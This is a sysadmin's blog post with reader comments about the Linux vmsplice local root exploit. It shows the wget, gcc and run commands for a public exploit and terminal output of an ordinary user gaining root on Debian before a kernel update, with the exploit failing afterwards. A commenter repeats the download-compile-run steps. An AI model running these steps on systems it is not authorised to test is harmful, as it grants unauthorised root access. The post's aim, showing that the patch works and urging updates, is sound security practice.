Yes, everyone was talking about Linux vmsplice Local Root Exploit. Izhar, Erek Dyskant and Aphesz were already experienced it.
Here is my experience on my Debian (Testing), before & after the kernel update.
Prologue
mij@unforgiven:/tmp$ uname -r; cat /etc/debian_version; id 2.6.22-3-amd64 lenny/sid uid=1000(mij) gid=1000(mij) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(mij) mij@unforgiven:/tmp$ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c mij@unforgiven:/tmp$ gcc 27704.c -o exploit
Before Kernel Update
mij@unforgiven:/tmp$ ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x100000000000 .. 0x100000001000 [+] page: 0x100000000000 [+] page: 0x100000000038 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x2b344e19a000 .. 0x2b344e1cc000 [+] root root@unforgiven:/tmp# id uid=0(root) gid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(mij)
After Kernel Update
mij@unforgiven:/tmp$ ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x100000000000 .. 0x100000001000 [+] page: 0x100000000000 [+] page: 0x100000000038 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x2b7bfe66f000 .. 0x2b7bfe6a1000 [-] vmsplice: Bad address mij@unforgiven:/tmp$ id uid=1000(mij) gid=1000(mij) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(mij)
So, moral of the story is; UPDATE YOUR KERNEL now. Below are the security advisories,
- Debian: DSA-1494-1 linux-2.6 — missing access checks
- Red Hat: [RHSA-2008:0129-01] Important: kernel security update
- SuSE: SUSE Security Announcement: Linux kernel (SUSE-SA:2008:007)
To Debian user, please take note that this bug has been fixed in Stable & Testing distribution. As for Unstable (Sid), I’m not sure.
{ 21 } Comments
tak payah paranoid sangat la,
Usingkalo takat kat laptop tu je.
alahai, geek sungguh la wahai ikan patin ni
weh.. aku pun patin weh!
Usingmajulah ikan patin untuk negara
Usingowh. sysadmin mmg geek.. btw aku suka spam comment nie.. lazat
Usingbayangkan kalau ada sorang sysadmin test:-
root@Kenari:/var/www/lilina-0.7# ./exploit
bash: ./exploit: No such file or directory
lepas tu dia declare selamat
UsingHi there, new to linux and is searching high and low on google. Many talks but none simple enough for a new user to try and understand the whole thing.
What about a short howto to show :
1. how to test if our system is affected by this security hole (which definitely is)
2. how to do the kernel update to cover this hole (a good learning experience)
Definitely would benefit all lot of your blog subscribers who are keen to learn but is new to linux.
:-)
UsingCae,
Q: how to test if our system is affected by this security hole (which definitely is)
A: If you’re using Kernel 2.6.17 – 2.6.24.1, then there’s a high chance that you’re affected.
Q: how to do the kernel update to cover this hole (a good learning experience)
UsingA: It depends on your Linux distro, consult the documentation. If RedHat-based, it’s normally “rpm -ivh new_kernel”. If Debian-based, just “apt-get update && apt-get upgrade”. Again, concult the docs/manual. The bottom line is; update/upgrade your kernel!
As I’ve said earlier, my debian ( 2.6.22-3-686) installation is definitely affected :-)
Any chance of sharing a simple step by step howto to test for the security hole?
UsingCae,
UsingI’ve made a VERY SIMPLE instruction in my post to see how the exploit works. You just have to download the code, compile, and run the binary as a normal user. After that, you should be able to get root.
Irwan, that’s the funny part.
I am a totally none technical person and so your VERY SIMPLE , compile and run , is alien to me but something I am interested to learn.
Care to share :-)
Also, this shows how user friendly debian is, non-technie like me can get it installed and using as a full time desktop.
UsingDear Cae,
Q: how to test if our system is affected by this security hole (which definitely is)
A: follow these steps
1) wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
2) gcc 27704.c -o exploit
3) ./exploit
Q: how to do the kernel update to cover this hole (a good learning experience)
A: I believe it has something to do with stack overflow where it allow normal user to perform system call to become a root. the patches might change the memory address or maybe randomize it so that the exploit wont work
Usingramai sungguh ikan patin di sini.
Usingboleh buat kolam untuk ternak patin
woi patin2 sekalian,
Usingaku nak siang korang
jangan… nanti sysadmin marah
Usingceh. dia nak marah buat ape
UsingHi Xanda,
now I understand why irwan is fumming :-)
he did already wrote a VERY SIMPLE howto, just that I really do not know it’s there! LOL.
your 3 steps did the magic, TERIMA KASIH !
by the way, saya dak tahu malayu
hope I got the above sentence right :-)
Cheers
UsingXanda & Piju/Dolphin,
Sesungguhnya ikan patin tidak bersalah dalam hal ini. Ikan patin juga tiada kena mengena dengan Linux vmsplice Local Root Exploit & yg paling penting, ikan patin tidak se”g33k” korang berdua :D
Cae,
UsingIt’s nice to see non-techie to use Debian. As far as I know, non-techie prefer to use Ubuntu instead of Debian. As a Singaporean, you might want to join Linux User Group there :)
Gentoo rocks.. (once upon a time)
owh ya… tokey ikan patin pakai gentoo
Usingah,
Usingkalo berkaitan dengan temerloh / patin.
korang berdua la sasaran aku
jgn lupa wahai ikan patin sekalin…
Using*sekalian
Using{ 1 } Trackback
[...] SysAdmin’s Diary wrote an interesting post today on Linux vmsplice Local Root Exploit; Before & After Kernel UpdateHere’s a quick excerptLinux vmsplice Local Root Exploit; Before & After Kernel Update Yes, everyone was talking about Linux vmsplice Local Root Exploit. Izhar, Erek Dyskant and Aphesz were already experienced it. Here is my experience on my Debian (Testing), before & after the kernel update. Prologue mij@unforgiven:/tmp$ uname -r; cat /etc/debian_version; id 2.6.22-3-amd64 lenny/sid uid=1000(mij) gid=1000(mij) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(mij) mij@unforgiven:/tmp$ [...]
Post a Comment